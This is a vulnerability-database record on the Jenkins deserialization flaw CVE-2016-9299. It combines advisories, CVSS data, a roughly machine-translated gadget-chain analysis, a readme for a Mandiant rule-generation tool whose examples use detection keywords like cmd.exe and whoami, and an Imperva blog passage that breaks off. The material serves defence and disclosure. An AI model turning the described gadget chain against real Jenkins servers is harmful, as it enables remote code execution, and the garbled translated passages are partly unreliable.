"CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-11-30T08:07:23", "type": "mageia", "title": "Updated jenkins-remoting packages fix security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9299"], "modified": "2016-11-30T08:07:23", "id": "MGASA-2016-0406", "href": "https://advisories.mageia.org/MGASA-2016-0406.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osv": [{"lastseen": "2023-02-03T05:57:15", "description": "The remoting module in Jenkins before 2.32 and LTS before 2.19.3 allows remote attackers to execute arbitrary code via a crafted serialized Java object, which triggers an LDAP query to a third-party server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-14T01:00:43", "type": "osv", "title": "Improper Neutralization of Special Elements used in an LDAP Query in Jenkins", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9299"], "modified": "2023-02-03T05:57:12", "id": "OSV:GHSA-2X9H-H3C4-WQQH", "href": "https://osv.dev/vulnerability/GHSA-2x9h-h3c4-wqqh", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "myhack58": [{"lastseen": "2017-02-05T09:00:41", "edition": 2, "description": "Source: [gone with the wind's Blog](<https://www.iswin.org/2017/01/25/Jenkins-LDAP-Deserializable-Vulnerablity-CVE-2016-9299-Analysis/>)\n\nAuthor: [iswin](<https://www.iswin.org/about>)\n\nThis vulnerability in the last 11 month of official release announcement when I was concerned too, when he was looking for com. sun. jndi. ldap. LdapAttribute this class related to the deserialization was aware of this category inside the _getAttributeSyntaxDefinition()_ method and _getAttributeDefinition()_ there may be a deserialization problem, but at the time looking for a lot of classes, found in the sequence of time can trigger these two methods, the original thought is the jdk inside their own problems, and finally it didn't continue to talk down, Midway has Gaijin released a ppt inside presentation this vulnerability, probably looked under found is to use json to bypass Jenkins White List, The time has been busy with data analysis of things, things just ran aground, and shortly before just the MSF on the Payload, plus end up not so many things, so studied, this vulnerability was quite interesting, to the knowledge of the surface or slightly wide a bit, here have to admire those vulnerabilities found.\n\nWhenever a vulnerability is a vulnerability appears, I got to thinking why yourself can not be found, when every time a vulnerability analysis of the complete time only to find aspects of the gap really is not small.\n\n#### Technology is to share, so in order to progress.\n\n### Vulnerability description\n\n2016 11 May 16, Jenkins official released a security announcement, named [CVE-2016-9299](<https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2016-11-16>) ,from the advertisement point of view, the vulnerability is still a reverse sequence of vulnerability, but this vulnerability deserialization and LDAP, but in the reverse sequence after the need to connect to a malicious LDAP server, Jenkins for before deserialization method of repair is for some malicious class to add a blacklist, so here first of all have to Bypass the official blacklist, for the vulnerability is only so much information, and in the official to the POC inside also merely referred to the com. sun. jndi. ldap. LdapAttribute this class, this vulnerability using the first authentication is not required, but can be arbitrary code execution, harm the evident.\n\n### Vulnerability analysis\n\nFrom the official description as well as the back of the Payload point of view, the problem and the net. sf. json and the com. sun. jndi. ldap. LdapAttribute about, through the analysis of the LdapAttribute for this class of analysis, we can determine the following two methods are trigger deserialization vulnerability the root on the below LDAP reverse sequence-related knowledge please 16 years blackhat foreigners of the Paper \u201cus-16-Munoz-A-Journey-From-the JNDI-LDAP-Manipulation-To-RCE\u201dto\n\n* getAttributeSyntaxDefinition\n* getAttributeDefinition\n\nThese two methods are invoked the _DirContext schema = getBaseCtx(). getSchema(rdn);_ code fragment which getBaseCtx()method is defined as follows:\n\n! [](/Article/UploadPic/2017-2/201724165543569. png)\n\nThe sections of the code using jndi way to access the LDAP service, where we can control the Context. PROVIDER_URL parameters, thereby controlling the jndi to access the LDAP server address.\n\ngetSchema(rdn)method will eventually call the com. sun. jndi. ldap. LdapBindingEnumeration. createItem(String, Attributes, Vector) method to call the relationship too much, your go to debug, the method is defined in the following figure\n\n! [](/Article/UploadPic/2017-2/201724165544831. png)\n\nIn this method will eventually call Obj. decodeObject(attrs) method, in order to achieve the object deserialization. Here a little mention, com. sun. jndi. ldap. Obj object defines several object serialization and deserialization methods, there is a direct deserialization, but also directly through the remote loading, here is the deserialization a little with the deserialization of different points that we can't remote loading of objects, because com. sun. jndi. ldap. VersionHelper12. trustURLCodebase the default value is false, it directly determines the class loader can only load the current classpath the following class, on how to construct the object so that the LDAP in the deserialization can execute arbitrary code, see below.\n\nHere we know the com. sun. jndi. ldap. LdapAttribute related to the method can trigger a deserialization exploit, so now we have to do is go find a class at deserialization time can call we accordingly trigger the vulnerability function, that is, in the deserialization can call getAttributeSyntaxDefinition method or getAttributeDefinition method of the class, by a foreigner of the PPT and open the gadgets, we slightly analysis you'll find on the net. sf. json, this class library exists can call the class any of the getXXX functions in the place, then com. sun. jndi. ldap. LdapAttribute this class in the getXXX method is not also can through this way to call, first of all, we first determine what exactly is that class of that method can call the getXXX function, by the gadgets in the json Payload we find that eventually calls the object's getXXX function is as follows figure net. sf. json. JSONObject. defaultBeanProcessing(Object, JsonConfig) is shown in\n\nOn the figure circled the two places that can call the getXXX function of the place, here will first traverse the JavaBeans of all the attributes, the last in the door-to-Door calls.\n\nFigured out able to function call the root causes, the next step is to find this function exactly what will trigger. By eclipse we can easily find the following call.\n\n! [](/Article/UploadPic/2017-2/201724165544409. png)\n\nAs shown in the above figure, we can see defaultBeanProcessing method will eventually be ConcurrentSkipListSet class in the equals method calls, to many people here might ask, so many call the relationship, why are you just looking for this class's equals method here might have some experience on the inside, because for and the equals method associated things too much, for java in some data structure, such as a Set,each time adding the element of time will determine whether the current key is present, there is compare whether two objects are equal when to call the hashcode and equals method, here if know through other deserialization of the students on this may be slightly touched, such as the jdk that deserialization of the trigger process. If this experience is not the case, then you can only one one to find.\n\n**[1] [[2]](<83274_2.htm>) [[3]](<83274_3.htm>) [[4]](<83274_4.htm>) [next](<83274_2.htm>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-02-04T00:00:00", "type": "myhack58", "title": "Jenkins-LDAP (CVE-2016-9299) deserialization vulnerability analysis-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9299"], "modified": "2017-02-04T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2017/83274.htm", "id": "MYHACK58:62201783274", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2022-03-23T16:19:22", "description": "The remoting module in Jenkins before 2.32 and LTS before 2.19.3 allows remote attackers to execute arbitrary code via a crafted serialized Java object, which triggers an LDAP query to a third-party server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-01-12T23:59:00", "type": "cve", "title": "CVE-2016-9299", "cwe": ["CWE-90"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9299"], "modified": "2019-05-22T15:06:00", "cpe": ["cpe:/a:jenkins:jenkins:2.19.2", "cpe:/o:fedoraproject:fedora:25", "cpe:/a:jenkins:jenkins:2.31"], "id": "CVE-2016-9299", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-9299", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:jenkins:jenkins:2.19.2:*:*:*:lts:*:*:*", "cpe:2.3:o:fedoraproject:fedora:25:*:*:*:*:*:*:*", "cpe:2.3:a:jenkins:jenkins:2.31:*:*:*:-:*:*:*"]}], "kitploit": [{"lastseen": "2022-05-12T21:31:10", "description": "[![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh96iyLi-WJuKHxzsUe2ew0LLbVkwXkKoWXWpcZ0mRX6YUdBo7uzVq0lxIihLA9awRncMpRG3Pz54Becx4VdqrQLs5gSE0N0eXTFeY3SvASRKmLUj29WSoNXUB9oiczpcdLkgyqQmTBmYpjyy432kXPM87zwjhA7s0hfpa0u5aqBPpNFNzCyggYVI4E/w640-h370/deserialization1.png)](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh96iyLi-WJuKHxzsUe2ew0LLbVkwXkKoWXWpcZ0mRX6YUdBo7uzVq0lxIihLA9awRncMpRG3Pz54Becx4VdqrQLs5gSE0N0eXTFeY3SvASRKmLUj29WSoNXUB9oiczpcdLkgyqQmTBmYpjyy432kXPM87zwjhA7s0hfpa0u5aqBPpNFNzCyggYVI4E/s1882/deserialization1.png>)\n\n \n\n\nProgrammatically create hunting rules for deserialization [exploitation](<https://www.kitploit.com/search/label/Exploitation> \"exploitation\" ) with multiple\n\n * keywords (e.g. cmd.exe)\n * gadget chains (e.g. CommonsCollection)\n * object types (e.g. ViewState, Java, Python Pickle, PHP)\n * encodings (e.g. Base64, raw)\n * rule types (e.g. Snort, Yara)\n\n \n\n\n### Disclaimer\n\nRules generated by this tool are intended for hunting/research purposes and are not designed for high fidelity/blocking purposes.\n\nPlease _test thoroughly_ before deploying to any production systems.\n\nThe Yara rules are primarily intended for scanning web server logs. Some of the \"object prefixes\" are only 2 bytes long, so they can make large scans a bit slow. _(Translation: please don't drop them all into VT Retrohunt.)_\n\n### Usage\n\nHelp: `python3 heyserial.py -h`\n\nExamples:\n \n \n python3 heyserial.py -c 'ExampleChain::condition1+condition2' -t JavaObj python3 heyserial.py -k cmd.exe whoami 'This file cannot be run in DOS mode' python3 heyserial.py -k Process.Start -t NETViewState -e base64 \"base64+utf16le\" \n\n# Utils\n\n### utils/checkyoself.py\n\nThis is a tool to automate bulk testing of Snort and Yara rules on a variety of sample files.\n\nUsage: `python3 checkyoself.py [-y rules.yara] [-s rules.snort] [-o file_output_prefix] [--matches] [--misses] -d malware.exe malware.pcap`\n\nExamples: `python3 checkyoself.py -y rules/javaobj -s rules/javaobj -d payloads/javaobj pcaps --misses -o java_misses`\n\n### utils/generate_payloads.ps1\n\nYSoSerial.NET v1.34 payload generation. Run on Windows from the ./utils directory.\n\n * Source: <https://github.com/pwntester/ysoserial.net>\n * License: ysoserial.net_LICENSE.txt\n\n### utils/generate_payloads.sh\n\nYSoSerial payload generation. Run on Linux from the ./utils directory.\n\n * Source: <https://github.com/frohoff/ysoserial>\n * License: ysoserial_LICENSE.txt\n\n### utils/install_snort.sh\n\nInstalling Snort on a Debian based system was a bit finnicky for me, so I wrote my install notes here.\n\n_Use at your own risk _in a VM_ that _you have snapshotted recently_._\n\n### utils/server.py\n\nSimple Python script that runs an HTTP server on 127.0.0.1:12345 and accepts POST requests.\n\nHandy for generating test PCAPs.\n\n# License\n\nCopyright (C) 2021 Alyssa Rahman, Mandiant, Inc. All Rights Reserved. Licensed under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at: [package root]/LICENSE.txt Unless required by applicable law or agreed to in writing, software [distributed](<https://www.kitploit.com/search/label/Distributed> \"distributed\" ) under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.\n\n# Contributing\n\nCheck out the Developers' guide (DEVELOPERS.md) for more details on extending HeySerial!\n\n# Prior Work/Related Resources\n\nTools\n\n * [Deserialization-Cheat-Sheet](<https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet> \"Deserialization-Cheat-Sheet\" ) \u2013 @GrrrDog\n * [Ysoserial](<https://github.com/frohoff/ysoserial> \"Ysoserial\" ) \\- @frohoff\n * [MarshalSec](<https://github.com/frohoff/marshalsec> \"MarshalSec\" ) \\- @frohoff\n * [Ysoserial (forked)](<https://github.com/wh1t3p1g/ysoserial> \"Ysoserial \$forked\$\" ) \\- @wh1t3p1g\n * [Ysoserial.NET](<https://github.com/pwntester/ysoserial.net> \"Ysoserial.NET\" ) and [v2 branch](<https://github.com/pwntester/ysoserial.net/tree/v2> \"v2 branch\" ) \\- @pwntester\n * [ViewGen](<https://github.com/0xacb/viewgen> \"ViewGen\" ) \u2013 0xacb\n * [Rogue-JNDI](<https://github.com/veracode-research/rogue-jndi> \"Rogue-JNDI\" ) \\- @veracode-research\n\nVulnerabilities\n\n * Log4J ([CVE-2021-44228](<https://www.lunasec.io/docs/blog/log4j-zero-day/> \"CVE-2021-44228\" ))\n * Exchange ([CVE-2021-42321](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42321> \"CVE-2021-42321\" ))\n * Zoho ManageEngine ([CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189> \"CVE-2020-10189\" ))\n * Jira ([CVE-2020-36239](<https://oxalis.io/atlassian-jira-data-centers-critical-vulnerability-what-you-need-to-know/> \"CVE-2020-36239\" ))\n * Telerik ([CVE-2019-18935](<https://bishopfox.com/blog/cve-2019-18935-remote-code-execution-in-telerik-ui> \"CVE-2019-18935\" ))\n * C1 CMS ([CVE-2019-18211](<https://medium.com/@frycos/yet-another-net-deserialization-35f6ce048df7> \"CVE-2019-18211\" ))\n * Jenkins ([CVE-2016-9299](<https://nvd.nist.gov/vuln/detail/CVE-2016-9299> \"CVE-2016-9299\" ))\n * [What Do WebLogic, WebSphere, JBoss, Jenkins, OpenNMS, and Your Application Have in Common? This Vulnerability.](<https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/> \"What Do WebLogic, WebSphere, JBoss, Jenkins, OpenNMS, and Your Application Have in Common? This Vulnerability.\" ) \u2013 @breenmachine, FoxGloveSecurity (2015)\n\nTalks and Write-Ups\n\n * [PSA: Log4Shell and the current state of JNDI injection](<https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/> \"PSA: Log4Shell and the current state of JNDI injection\" ) \\- Moritz Bechler (2021)\n * [This is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits](<https://www.mandiant.com/resources/apt41-initiates-global-intrusion-campaign-using-multiple-exploits> \"This is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits\" ) \u2013 Chris Glyer, Dan Perez, Sarah Jones, Steve Miller (2020)\n * [Deep Dive into .NET ViewState deserialization and its exploitation](<https://swapneildash.medium.com/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817> \"Deep Dive into .NET ViewState deserialization and its exploitation\" ) \u2013 Swapneil Dash (2019)\n * [Exploiting ](<https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/> \"Exploiting\" )[Deserialization](<https://www.kitploit.com/search/label/Deserialization> \"Deserialization\" ) in ASP.NET via ViewState \u2013 Soroush Dalili (2019)\n * [Use of Deserialization in .NET Framework Methods and Classes](<https://research.nccgroup.com/wp-content/uploads/2020/07/whitepaper-new.pdf> \"Use of Deserialization in .NET Framework Methods and Classes\" ) \u2013 Soroush Dalili(2018)\n * [Friday the 13th, JSON Attacks](<https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf> \"Friday the 13th, JSON Attacks\" ) \u2013 Alvaro Mu\u00f1os and Oleksandr Mirosh (2017)\n * [Exploiting .NET Managed DCOM](<https://googleprojectzero.blogspot.com/2017/04/exploiting-net-managed-dcom.html> \"Exploiting .NET Managed DCOM\" ) \u2013 James Forshaw, Project Zero (2017)\n * [Java Unmarshaller Security](<https://github.com/frohoff/marshalsec/blob/master/marshalsec.pdf> \"Java Unmarshaller Security\" ) \u2013 Moritz Bechler (2017)\n * [Deserialize My Shorts](<https://www.slideshare.net/frohoff1/deserialize-my-shorts-or-how-i-learned-to-start-worrying-and-hate-java-object-deserialization> \"Deserialize My Shorts\" ) \u2013 Chris Frohoff (2016)\n * [Pwning Your Java Messaging with Deserialization Vulnerabilities](<https://www.blackhat.com/docs/us-16/materials/us-16-Kaiser-Pwning-Your-Java-Messaging-With-Deserialization-Vulnerabilities-wp.pdf> \"Pwning Your Java Messaging with Deserialization Vulnerabilities\" ) \u2013 Matthias Kaiser (2016)\n * [Journey from JNDI/LDAP ](<https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE-wp.pdf> \"Journey from JNDI/LDAP\" )[Manipulation](<https://www.kitploit.com/search/label/Manipulation> \"Manipulation\" ) to [Remote Code Execution](<https://www.kitploit.com/search/label/Remote%20Code%20Execution> \"Remote Code Execution\" ) Dream Land \u2013 Alvaro Mu\u00f1os and Oleksandr Mirosh (2016)\n * [Marshalling Pickles](<https://www.youtube.com/watch?v=KSA7vUkXGSg> \"Marshalling Pickles\" ) \u2013 Chris Frohoff and Gabriel Lawrence (2015)\n * [Are you my Type? Breaking .NET Through Serialization](<https://github.com/VulnerableGhost/.Net-Sterilized--Deserialization-Exploitation/blob/master/BH_US_12_Forshaw_Are_You_My_Type_WP.pdf> \"Are you my Type? Breaking .NET Through Serialization\" ) \u2013 James Forshaw (2012)\n * [A Spirited Peek into ViewState](<https://deadliestwebattacks.com/2011/05/13/a-spirited-peek-into-viewstate-part-i/> \"A Spirited Peek into ViewState\" ) \u2013 Mike Shema (2011)\n\n \n\n\n**Author:** Alyssa Rahman @ramen0x3f\n\n**Created:** 2021-10-27\n\n**Last Updated:** 2021-12-02\n\n**Blog:** <https://www.mandiant.com/resources/hunting-deserialization-exploits>\n\nFor more details on this tool and the research process behind it, check out [our blog](<https://www.mandiant.com/resources/hunting-deserialization-exploits> \"our blog\" )!\n\n \n \n\n\n**[Download Heyserial](<https://github.com/mandiant/heyserial> \"Download Heyserial\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-12T21:30:00", "type": "kitploit", "title": "Heyserial - Programmatically Create Hunting Rules For Deserialization Exploitation With Multiple Keywords, Gadget Chains, Object Types, Encodings, And Rule Types", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9299", "CVE-2019-18211", "CVE-2019-18935", "CVE-2020-10189", "CVE-2020-36239", "CVE-2021-42321", "CVE-2021-44228"], "modified": "2022-05-12T21:30:00", "id": "KITPLOIT:1207079539580982634", "href": "http://www.kitploit.com/2022/05/heyserial-programmatically-create.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "impervablog": [{"lastseen": "2018-01-25T09:59:26", "description": "Imperva\u2019s research group is constantly monitoring new web application vulnerabilities. In doing so, we\u2019ve noticed at least four major insecure deserialization vulnerabilities that were published in the past year.\n\nOur analysis shows that, in the past three months, the number of deserialization attacks has grown by 300 percent on average, turning them into a serious security risk to web applications.\n\nTo make things worse, many of these attacks are now launched with the intent of installing crypto-mining malware on vulnerable web servers, which gridlocks their CPU usage.\n\nIn this blog post we will explain what insecure deserialization vulnerabilities are, show the growing trend of attacks exploiting these vulnerabilities and explain what attackers do to exploit them (including real-life attack examples).\n\n## What Is Serialization?\n\nThe process of serialization converts a \u201clive\u201d object (structure and/or state), like a Java object, into a format that can be sent over the network, or stored in memory or on disk. Deserialization converts the format back into a \u201clive\u201d object.\n\nThe purpose of serialization is to preserve an object, meaning that the object will exist outside the lifetime of the local machine on which it is created.\n\nFor example, when withdrawing money from an ATM, the information of the account holder and the required operation is stored in a local object. Before this object is sent to the main server, it is serialized in order to perform and approve the needed operations. The server then deserializes the object to complete the operation.\n\n## Types of Serialization\n\nThere are many types of [serialization](<https://en.wikipedia.org/wiki/Serialization#Serialization_formats>) available, depending on the object which is being serialized and on the purpose. Almost all modern programming languages support serialization. In Java for example an object is converted into a compact representation using byte stream, and the byte stream can then be reverted back into a copy of that object.\n\nOther types of serialization include converting an object into a hierarchical format like JSON or XML. The advantage of this serialization is that the serialized objects can be read as plain text, instead of a byte stream.\n\n## Deserialization Vulnerabilities from the Past Three Months\n\nIn the [OWASP top 10 security risks of 2017](<https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf>) insecure deserialization came in at [eighth place](<https://www.owasp.org/index.php/Top_10-2017_A8-Insecure_Deserialization>) and rightfully so as we argued in our [previous blog](<https://www.imperva.com/blog/2017/12/the-state-of-web-application-vulnerabilities-in-2017/>) about the state of web application vulnerabilities in 2017.\n\nIn 2017, major new vulnerabilities related to insecure serialization, mostly in Java, were published (see Figure 1).\n\n**Name** | **Release Date (Day/Month/Year)** | **Vulnerability details** \n---|---|--- \nCVE-2017-12149 | 01/08/2017 | Vulnerability in the JBoss Application Server allows execution of arbitrary code via crafted serialized data because the HTTP Invoker does not restrict classes for which it performs deserialization \nCVE-2017-10271 | 21/06/2017 | Vulnerability in the Oracle WebLogic Server allows execution of arbitrary code due to insufficient sanitizing of user supplied inputs in the wls-wsat component \nCVE-2017-9805\n\n | 21/06/2017 | The REST Plugin in Apache Struts uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to remote code execution when deserializing XML payloads. \nCVE-2017-7504 | 05/04/2017 | The HTTPServerILServlet.java in JMS allows remote attackers to execute arbitrary code via crafted serialized data because it does not restrict the classes for which it performs deserialization \n \n_Figure 1: CVEs related to insecure deserialization_\n\nIn order to understand the magnitude of these vulnerabilities, we analyzed attacks from the past three months (October to December of 2017) that try to exploit insecure deserialization. A key observation is the _steep_ increase of deserialization attacks in the past few months, as can be seen in the Figure 2.\n\n \n_Figure 2: Insecure deserialization attacks over the course of three months_\n\nMost of the attackers used no attack vectors other than insecure deserialization. We noticed that each attacker was trying to exploit different vulnerabilities, with the above-mentioned CVEs being the most prevalent.\n\nFor a full list of CVEs related to insecure deserialization from the past few years see Figure 3.\n\n**Name** | **Relevant System** | **Public Exploit** | **Name** | **Relevant System** | **Public Exploit** \n---|---|---|---|---|--- \nCVE-2017-9844 | SAP NetWeaver | Yes | CVE-2016-2170 | Apache OFBiz | No \nCVE-2017-9830 | Code42 CrashPlan | No | CVE-2016-2003 | HP P9000, XP7 Command View Advanced Edition (CVAE) Suite | No \nCVE-2017-9805 | Apache Struts | Yes | CVE-2016-2000 | HP Asset Manager | No \nCVE-2017-7504 | Red Hat JBoss | Yes | CVE-2016-1999 | HP Release Control | No \nCVE-2017-5878 | Apache OpenMeetings | Yes | CVE-2016-1998 | HP Service Manager | No \nCVE-2017-5645 | Apache Log4j | No | CVE-2016-1997 | HP Operations Orchestration | No \nCVE-2017-5641 | Apache BlazeDS | Yes | CVE-2016-1986 | HP Continuous Delivery Automation | No \nCVE-2017-5586 | OpenText Documentum D2 | Yes | CVE-2016-1985 | HP Operations Manager | No \nCVE-2017-3159 | Apache Camel | Yes | CVE-2016-1487 | Lexmark Markvision Enterprise | No \nCVE-2017-3066 | Adobe ColdFusion | Yes | CVE-2016-1291 | Cisco Prime Infrastructure | Yes \nCVE-2017-2608 | Jenkins | Yes | CVE-2016-0958 | Adobe Experience Manager | No \nCVE-2017-12149 | Red Hat JBoss | Yes | CVE-2016-0788 | Jenkins | Yes \nCVE-2017-11284 | Adobe ColdFusion | No | CVE-2016-0779 | Apache TomEE | No \nCVE-2017-11283 | Adobe ColdFusion | No | CVE-2016-0714 | Apache Tomcat | No \nCVE-2017-1000353 | CloudBees Jenkins | Yes | CVE-2015-8765 | McAfee ePolicy Orchestrator | No \nCVE-2016-9606 | Resteasy | Yes | CVE-2015-8581 | Apache TomEE | No \nCVE-2016-9299 | Jenkins | Yes | CVE-2015-8545 | NetApp | No \nCVE-2016-8749 | Jackson (JSON) | Yes | CVE-2015-8360 | Atlassian Bamboo | No \nCVE-2016-8744 | Apache Brooklyn | Yes | CVE-2015-8238 | Unify OpenScape | No \nCVE-2016-8735 | Apache Tomcat JMX | Yes | CVE-2015-8237 | Unify OpenScape | No \nCVE-2016-7462 | VMWare vRealize Operations | No | CVE-2015-8103 | Jenkins | Yes \nCVE-2016-6809 | Apache Tika | No | CVE-2015-7501 | Red Hat JBoss | Yes \nCVE-2016-5229 | Atlassian Bamboo | Yes | CVE-2015-7501 | Oracle Application Testing Suite | No \nCVE-2016-5004 | Apache Archiva | Yes | CVE-2015-7450 | IBM Websphere | Yes \nCVE-2016-4385 | HP Network Automation | No | CVE-2015-7253 | Commvault Edge Server | Yes \nCVE-2016-4372 | HP iMC | No | CVE-2015-6934 | VMWare vCenter/vRealize | No \nCVE-2016-3642 | Solarwinds Virtualization Manager | Yes | CVE-2015-6576 | Atlassian Bamboo | No \nCVE-2016-3461 | Oracle MySQL Enterprise Monitor | Yes | CVE-2015-6555 | Symantec Endpoint Protection Manager | Yes \nCVE-2016-3427 | JMX | Yes | CVE-2015-6420 | Cisco (various frameworks) | No \nCVE-2016-3415 | Zimbra Collaboration | No | CVE-2015-5348 | Apache Camel | No \nCVE-2016-2510 | Red Hat JBoss BPM Suite | No | CVE-2015-5254 | Apache ActiveMQ | No \nCVE-2016-2173 | Spring AMPQ | No | CVE-2015-4852 | Oracle WebLogic | Yes \nCVE-2016-2170 | Apache OFBiz | No | CVE-2015-3253 | Jenkins | Yes \nCVE-2016-2003 | HP P9000, XP7 Command View Advanced Edition (CVAE) Suite | No | CVE-2012-4858 | IBM Congnos BI | No \n \n_Figure 3: CVEs related to insecure deserialization_\n\n## Deserialization Attacks in the Wild\n\nMost of the attacks that we saw are related to byte-stream serialization of Java objects. Also, we saw some attacks related to serialization to XML and other formats, see Figure 4.\n\n \n_Figure 4: Distribution of vulnerabilities over different serialization formats_\n\nIn the following attack (see Figure 5) the attacker is trying to exploit 